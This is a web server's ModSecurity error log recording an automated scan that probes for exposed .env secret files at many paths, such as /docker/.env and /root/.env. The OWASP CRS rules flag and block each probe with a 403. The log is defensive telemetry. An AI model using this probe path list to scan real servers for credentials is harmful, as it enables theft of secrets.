[Fri Mar 20 15:01:18.876065 2026] [:error] [pid 2815711] [client 162.158.87.2:13658] [client 162.158.87.2] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.docker"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.docker"] [unique_id "ab1TLvy1_WiwY9KfWu_4xgAAAAI"]
[Fri Mar 20 15:01:18.876199 2026] [:error] [pid 2815711] [client 162.158.87.2:13658] [client 162.158.87.2] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.docker"] [unique_id "ab1TLvy1_WiwY9KfWu_4xgAAAAI"]
[Fri Mar 20 15:01:18.876325 2026] [:error] [pid 2815711] [client 162.158.87.2:13658] [client 162.158.87.2] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.docker"] [unique_id "ab1TLvy1_WiwY9KfWu_4xgAAAAI"]
[Fri Mar 20 15:01:18.880963 2026] [:error] [pid 2816018] [client 162.158.86.254:13006] [client 162.158.86.254] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.container"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.container"] [unique_id "ab1TLknH70iMTzyPh3kWlAAAAAY"]
[Fri Mar 20 15:01:18.881085 2026] [:error] [pid 2816018] [client 162.158.86.254:13006] [client 162.158.86.254] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.container"] [unique_id "ab1TLknH70iMTzyPh3kWlAAAAAY"]
[Fri Mar 20 15:01:18.881216 2026] [:error] [pid 2816018] [client 162.158.86.254:13006] [client 162.158.86.254] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.container"] [unique_id "ab1TLknH70iMTzyPh3kWlAAAAAY"]
[Fri Mar 20 15:01:18.887883 2026] [:error] [pid 2815713] [client 162.158.86.142:13502] [client 162.158.86.142] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "ab1TLpJiwBXnNifSr5verwAAAAQ"]
[Fri Mar 20 15:01:18.888023 2026] [:error] [pid 2815713] [client 162.158.86.142:13502] [client 162.158.86.142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "ab1TLpJiwBXnNifSr5verwAAAAQ"]
[Fri Mar 20 15:01:18.888167 2026] [:error] [pid 2815713] [client 162.158.86.142:13502] [client 162.158.86.142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "ab1TLpJiwBXnNifSr5verwAAAAQ"]
[Fri Mar 20 15:01:18.894772 2026] [:error] [pid 2817639] [client 162.158.86.143:11595] [client 162.158.86.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env.local"] [unique_id "ab1TLv9i5ZHhQgdGB68gJAAAAAg"]
[Fri Mar 20 15:01:18.894896 2026] [:error] [pid 2817639] [client 162.158.86.143:11595] [client 162.158.86.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env.local"] [unique_id "ab1TLv9i5ZHhQgdGB68gJAAAAAg"]
[Fri Mar 20 15:01:18.895029 2026] [:error] [pid 2817639] [client 162.158.86.143:11595] [client 162.158.86.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env.local"] [unique_id "ab1TLv9i5ZHhQgdGB68gJAAAAAg"]
[Fri Mar 20 15:01:18.900609 2026] [:error] [pid 2815734] [client 162.158.86.254:13014] [client 162.158.86.254] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /server/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/server/.env"] [unique_id "ab1TLm8zubx8zfwe9oW5PgAAAAU"]
[Fri Mar 20 15:01:18.900730 2026] [:error] [pid 2815734] [client 162.158.86.254:13014] [client 162.158.86.254] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/server/.env"] [unique_id "ab1TLm8zubx8zfwe9oW5PgAAAAU"]
[Fri Mar 20 15:01:18.900864 2026] [:error] [pid 2815734] [client 162.158.86.254:13014] [client 162.158.86.254] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/server/.env"] [unique_id "ab1TLm8zubx8zfwe9oW5PgAAAAU"]
[Fri Mar 20 15:01:18.911950 2026] [:error] [pid 2815712] [client 162.158.86.142:13510] [client 162.158.86.142] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /srv/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/srv/.env"] [unique_id "ab1TLqx8_pxqReT7SyGPHgAAAAM"]
[Fri Mar 20 15:01:18.912094 2026] [:error] [pid 2815712] [client 162.158.86.142:13510] [client 162.158.86.142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/srv/.env"] [unique_id "ab1TLqx8_pxqReT7SyGPHgAAAAM"]
[Fri Mar 20 15:01:18.912234 2026] [:error] [pid 2815712] [client 162.158.86.142:13510] [client 162.158.86.142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/srv/.env"] [unique_id "ab1TLqx8_pxqReT7SyGPHgAAAAM"]
[Fri Mar 20 15:01:18.915851 2026] [:error] [pid 2817640] [client 162.158.86.254:13016] [client 162.158.86.254] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "ab1TLhq8pDZXKMuYECLOYgAAAAk"]
[Fri Mar 20 15:01:18.915985 2026] [:error] [pid 2817640] [client 162.158.86.254:13016] [client 162.158.86.254] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "ab1TLhq8pDZXKMuYECLOYgAAAAk"]
[Fri Mar 20 15:01:18.916116 2026] [:error] [pid 2817640] [client 162.158.86.254:13016] [client 162.158.86.254] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "ab1TLhq8pDZXKMuYECLOYgAAAAk"]
[Fri Mar 20 15:01:18.961809 2026] [:error] [pid 2822566] [client 162.158.86.254:13007] [client 162.158.86.254] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /site/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "ab1TLmLvrbuE12wYiLe4NgAAABA"]
[Fri Mar 20 15:01:18.961960 2026] [:error] [pid 2822566] [client 162.158.86.254:13007] [client 162.158.86.254] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "ab1TLmLvrbuE12wYiLe4NgAAABA"]
[Fri Mar 20 15:01:18.962092 2026] [:error] [pid 2822566] [client 162.158.86.254:13007] [client 162.158.86.254] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "ab1TLmLvrbuE12wYiLe4NgAAABA"]
[Fri Mar 20 15:01:18.968379 2026] [:error] [pid 2815711] [client 162.158.87.2:13658] [client 162.158.87.2] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/www/.env"] [unique_id "ab1TLvy1_WiwY9KfWu_4xwAAAAI"]
[Fri Mar 20 15:01:18.968521 2026] [:error] [pid 2815711] [client 162.158.87.2:13658] [client 162.158.87.2] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/www/.env"] [unique_id "ab1TLvy1_WiwY9KfWu_4xwAAAAI"]
[Fri Mar 20 15:01:18.968651 2026] [:error] [pid 2815711] [client 162.158.87.2:13658] [client 162.158.87.2] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/www/.env"] [unique_id "ab1TLvy1_WiwY9KfWu_4xwAAAAI"]
[Fri Mar 20 15:01:18.972394 2026] [:error] [pid 2816018] [client 162.158.86.254:13006] [client 162.158.86.254] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/var/www/.env"] [unique_id "ab1TLknH70iMTzyPh3kWlQAAAAY"]
[Fri Mar 20 15:01:18.972523 2026] [:error] [pid 2816018] [client 162.158.86.254:13006] [client 162.158.86.254] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/var/www/.env"] [unique_id "ab1TLknH70iMTzyPh3kWlQAAAAY"]
[Fri Mar 20 15:01:18.972646 2026] [:error] [pid 2816018] [client 162.158.86.254:13006] [client 162.158.86.254] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/var/www/.env"] [unique_id "ab1TLknH70iMTzyPh3kWlQAAAAY"]
[Fri Mar 20 15:01:18.975744 2026] [:error] [pid 2815734] [client 162.158.86.254:13014] [client 162.158.86.254] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/www/html/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/var/www/html/.env"] [unique_id "ab1TLm8zubx8zfwe9oW5PwAAAAU"]
[Fri Mar 20 15:01:18.975849 2026] [:error] [pid 2815734] [client 162.158.86.254:13014] [client 162.158.86.254] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/var/www/html/.env"] [unique_id "ab1TLm8zubx8zfwe9oW5PwAAAAU"]
[Fri Mar 20 15:01:18.975971 2026] [:error] [pid 2815734] [client 162.158.86.254:13014] [client 162.158.86.254] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/var/www/html/.env"] [unique_id "ab1TLm8zubx8zfwe9oW5PwAAAAU"]
[Fri Mar 20 15:01:18.981803 2026] [:error] [pid 2817640] [client 162.158.86.254:13016] [client 162.158.86.254] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /home/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/home/.env"] [unique_id "ab1TLhq8pDZXKMuYECLOYwAAAAk"]
[Fri Mar 20 15:01:18.981920 2026] [:error] [pid 2817640] [client 162.158.86.254:13016] [client 162.158.86.254] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/home/.env"] [unique_id "ab1TLhq8pDZXKMuYECLOYwAAAAk"]
[Fri Mar 20 15:01:18.982063 2026] [:error] [pid 2817640] [client 162.158.86.254:13016] [client 162.158.86.254] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/home/.env"] [unique_id "ab1TLhq8pDZXKMuYECLOYwAAAAk"]
[Fri Mar 20 15:01:18.987041 2026] [:error] [pid 2815710] [client 162.158.86.142:13503] [client 162.158.86.142] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /root/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/root/.env"] [unique_id "ab1TLjQ9Th-2Y9b0JRd1vQAAAAE"]
[Fri Mar 20 15:01:18.987161 2026] [:error] [pid 2815710] [client 162.158.86.142:13503] [client 162.158.86.142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/root/.env"] [unique_id "ab1TLjQ9Th-2Y9b0JRd1vQAAAAE"]
[Fri Mar 20 15:01:18.987290 2026] [:error] [pid 2815710] [client 162.158.86.142:13503] [client 162.158.86.142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/root/.env"] [unique_id "ab1TLjQ9Th-2Y9b0JRd1vQAAAAE"]
[Fri Mar 20 15:01:18.992789 2026] [:error] [pid 2815713] [client 162.158.86.142:13502] [client 162.158.86.142] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env_config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env_config"] [unique_id "ab1TLpJiwBXnNifSr5vesAAAAAQ"]
